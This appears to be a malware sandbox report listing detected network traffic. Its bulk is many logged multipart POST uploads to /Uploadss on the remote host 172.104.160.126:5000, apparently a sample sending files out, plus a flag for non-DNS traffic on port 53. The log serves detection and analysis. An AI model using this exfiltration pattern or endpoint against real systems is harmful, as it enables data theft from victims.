Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49275
Source: unknown	Network traffic detected: HTTP traffic on port 49276 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49276
Source: unknown	Network traffic detected: HTTP traffic on port 49277 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49277
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49277
Source: unknown	Network traffic detected: HTTP traffic on port 49278 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49278
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49278
Source: unknown	Network traffic detected: HTTP traffic on port 49279 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49279
Source: unknown	Network traffic detected: HTTP traffic on port 49280 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49280
Source: unknown	Network traffic detected: HTTP traffic on port 49281 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49281
Source: unknown	Network traffic detected: HTTP traffic on port 49282 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49282
Source: unknown	Network traffic detected: HTTP traffic on port 49283 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49283
Source: unknown	Network traffic detected: HTTP traffic on port 49284 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49284
Source: unknown	Network traffic detected: HTTP traffic on port 49285 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49285
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49285
Source: unknown	Network traffic detected: HTTP traffic on port 49286 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49286
Source: unknown	Network traffic detected: HTTP traffic on port 49287 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49287
Source: unknown	Network traffic detected: HTTP traffic on port 49288 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49288
Source: unknown	Network traffic detected: HTTP traffic on port 49289 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49289
Source: unknown	Network traffic detected: HTTP traffic on port 49290 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49290
Source: unknown	Network traffic detected: HTTP traffic on port 49291 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49291
Source: unknown	Network traffic detected: HTTP traffic on port 49292 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49292
Source: unknown	Network traffic detected: HTTP traffic on port 49293 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49293
Source: unknown	Network traffic detected: HTTP traffic on port 49294 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49294
Source: unknown	Network traffic detected: HTTP traffic on port 49295 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49295
Source: unknown	Network traffic detected: HTTP traffic on port 49296 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49296
Source: unknown	Network traffic detected: HTTP traffic on port 49297 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49297
Source: unknown	Network traffic detected: HTTP traffic on port 49298 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49298
Source: unknown	Network traffic detected: HTTP traffic on port 49299 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49299
Source: unknown	Network traffic detected: HTTP traffic on port 49300 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49300
Source: unknown	Network traffic detected: HTTP traffic on port 49301 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49301
Source: unknown	Network traffic detected: HTTP traffic on port 49302 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49302
Source: unknown	Network traffic detected: HTTP traffic on port 49303 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49303
Source: unknown	Network traffic detected: HTTP traffic on port 49304 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49304
Source: unknown	Network traffic detected: HTTP traffic on port 49305 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49305
Source: unknown	Network traffic detected: HTTP traffic on port 49306 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49306
Source: unknown	Network traffic detected: HTTP traffic on port 49307 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49307
Source: unknown	Network traffic detected: HTTP traffic on port 49308 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49308
Source: unknown	Network traffic detected: HTTP traffic on port 49309 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49309
Source: unknown	Network traffic detected: HTTP traffic on port 49310 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49310
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49310
Source: unknown	Network traffic detected: HTTP traffic on port 49311 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49311
Source: unknown	Network traffic detected: HTTP traffic on port 49312 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49312
Source: unknown	Network traffic detected: HTTP traffic on port 49313 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49313
Source: unknown	Network traffic detected: HTTP traffic on port 49314 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49314
Source: unknown	Network traffic detected: HTTP traffic on port 49315 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49315
Source: unknown	Network traffic detected: HTTP traffic on port 49316 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49316
Source: unknown	Network traffic detected: HTTP traffic on port 49317 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49317
Source: unknown	Network traffic detected: HTTP traffic on port 49318 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49318
Source: unknown	Network traffic detected: HTTP traffic on port 49319 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49319
Source: unknown	Network traffic detected: HTTP traffic on port 49320 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49320
Source: unknown	Network traffic detected: HTTP traffic on port 49321 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49321
Source: unknown	Network traffic detected: HTTP traffic on port 49322 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49322
Source: unknown	Network traffic detected: HTTP traffic on port 49323 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49323
Source: unknown	Network traffic detected: HTTP traffic on port 49324 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49324
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49327 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49327
Source: unknown	Network traffic detected: HTTP traffic on port 49328 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49328
Source: unknown	Network traffic detected: HTTP traffic on port 49329 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49329
Source: unknown	Network traffic detected: HTTP traffic on port 49330 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49330
Source: unknown	Network traffic detected: HTTP traffic on port 49331 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49331
Source: unknown	Network traffic detected: HTTP traffic on port 49332 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49332
Source: unknown	Network traffic detected: HTTP traffic on port 49333 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49333
Source: unknown	Network traffic detected: HTTP traffic on port 49334 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49334
Source: unknown	Network traffic detected: HTTP traffic on port 49335 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49335
Source: unknown	Network traffic detected: HTTP traffic on port 49336 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49336
Source: unknown	Network traffic detected: HTTP traffic on port 49337 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49337
Source: unknown	Network traffic detected: HTTP traffic on port 49338 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49338

Detected non-DNS traffic on DNS port

Source: global traffic

TCP traffic: 192.168.2.6:49191 -> 1.1.1.1:53

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 763Content-Type: multipart/form-data; boundary=------------------------f9fa7306880345da
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 160166Content-Type: multipart/form-data; boundary=------------------------f13a1e66d9ac3858
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 106918Content-Type: multipart/form-data; boundary=------------------------3db099609e8ee48c
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 5243310Content-Type: multipart/form-data; boundary=------------------------f661165eccdedd9dExpect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------2fe595d5319db200
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------4b737e61e1b7e9bf
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------4e35b57d9f58fc90
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------815ab7d36e08e457
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a5d52e19e3fe200b
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------ec3ba31dfe96d326
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------f22aeea0bd5a0f8e
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------d8bdcfc228d82f5a
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------cfe9280e100efce1
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------904a2babf6d2f7ac
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------f49946b6384ac060
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------b85ce3e308f45060
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------614e08f55f0c2cfe
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------bea6c7b09692f28c
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------23dd402f4b4a39c5
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------e591042c4603c21a
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a0f76a6adccf351c
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------c4d90e433018b142
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------d2ca679a5d8f632b
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 763Content-Type: multipart/form-data; boundary=------------------------72fb5c35750f8204
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 160166Content-Type: multipart/form-data; boundary=------------------------43289e4b14c04ac7
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 106918Content-Type: multipart/form-data; boundary=------------------------71ca7f7e591272d4
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 5243310Content-Type: multipart/form-data; boundary=------------------------727b88163de31621Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------528cb38273400043
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------6ceab3228cef8607
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a158dee7d748d662
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------5e2d7668485dfa80
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------0f7ba0280905d0a7
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------b615441db0569974
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------c38b6efbb3860b55
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------e120409de9b0961d
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------df56891ade3f02b5
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------5b9a6ba60e763601
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------6125ed5460a004ed
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------0cd032303c66daa3
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------4103ce5fab37505e
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------e9d6222010bc4b93
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------2aa72388551e1719
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------77f946c49d2aa0aa
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------23ddd58ceee731b1
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------b152df86b4cdc780
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------2d6437b9e8f9fa26
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------f9fda7251b3940ec
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------b875c75c93bfafb2
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------90b1444f43bf87bb
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------f596c2ad5c87a402
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------eebee10a2c2a0a7e
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------fb127d9661ca100d
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------6653a23fed80a45e
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------37776beab8920800
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------40df58b3406d3c6c
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------7048acb243c73c53
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------915bf5cdc8e28206
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------b29bc1940f1b3cf8
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------faed09c6aeddfcad
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------9e028a09e8444741
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------1ebd341a5c4734af
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------0a25b701dad0bb75
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------917bcfd4af7652d9
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------3755ae52020b6387
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------5781aa9441631b3e
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------f897addde1370454
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------793f3f5fb8213a21
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------79bb560cb57ad0e1
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a317104ee2cc8105
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------883a00c3844ef429
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------57415b48de4d495c
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------3cce8b88a3742ee2
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------b2be66a73755a4fd
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------25a531a286c8b417
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------01eb8640365fd751
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------6f4cfa28ab6b91ba
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------0f60835c471703b6
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------30e95938f8d682b4
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------fa71821352b7a857
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------1d41fea49894b271
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------4c1e4f796c2c9c93
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------fff4f274d4698b1d
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------edd5ebff721373ff
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------e20020832d30f3c0
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------d4472314239c3705
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------7e127aa7b6ef26df
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------0cf99223c92232cd
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------7ce2fb84c3dc7384
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------d8f7e01a7de6f04f
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------f7a61e38904fcff7
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------8977623888b015d2
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------8961b875dcb6c2ce
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------00f564c0c06baa17
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------eaaf87d8ac660071
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------4db416eccd57981d
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------6ea26e32a284dc76
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------4be51b091cf7dce2
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------fffb92063f61af58
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------bcadf6652bcb5995
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a0c3d46717813838
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------71e83fa42945e82e
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------2774b4aa52ecef71
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------9299cdde274089f9
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------32889ea7ae55e121
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a678ad0b838c4a42
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------271c99aa13addee5
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------4d702bb6621a98ce
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------3ff2595632dfd343
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------6be2ae2c8e7d9a07
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------5287d62a7467fc4e
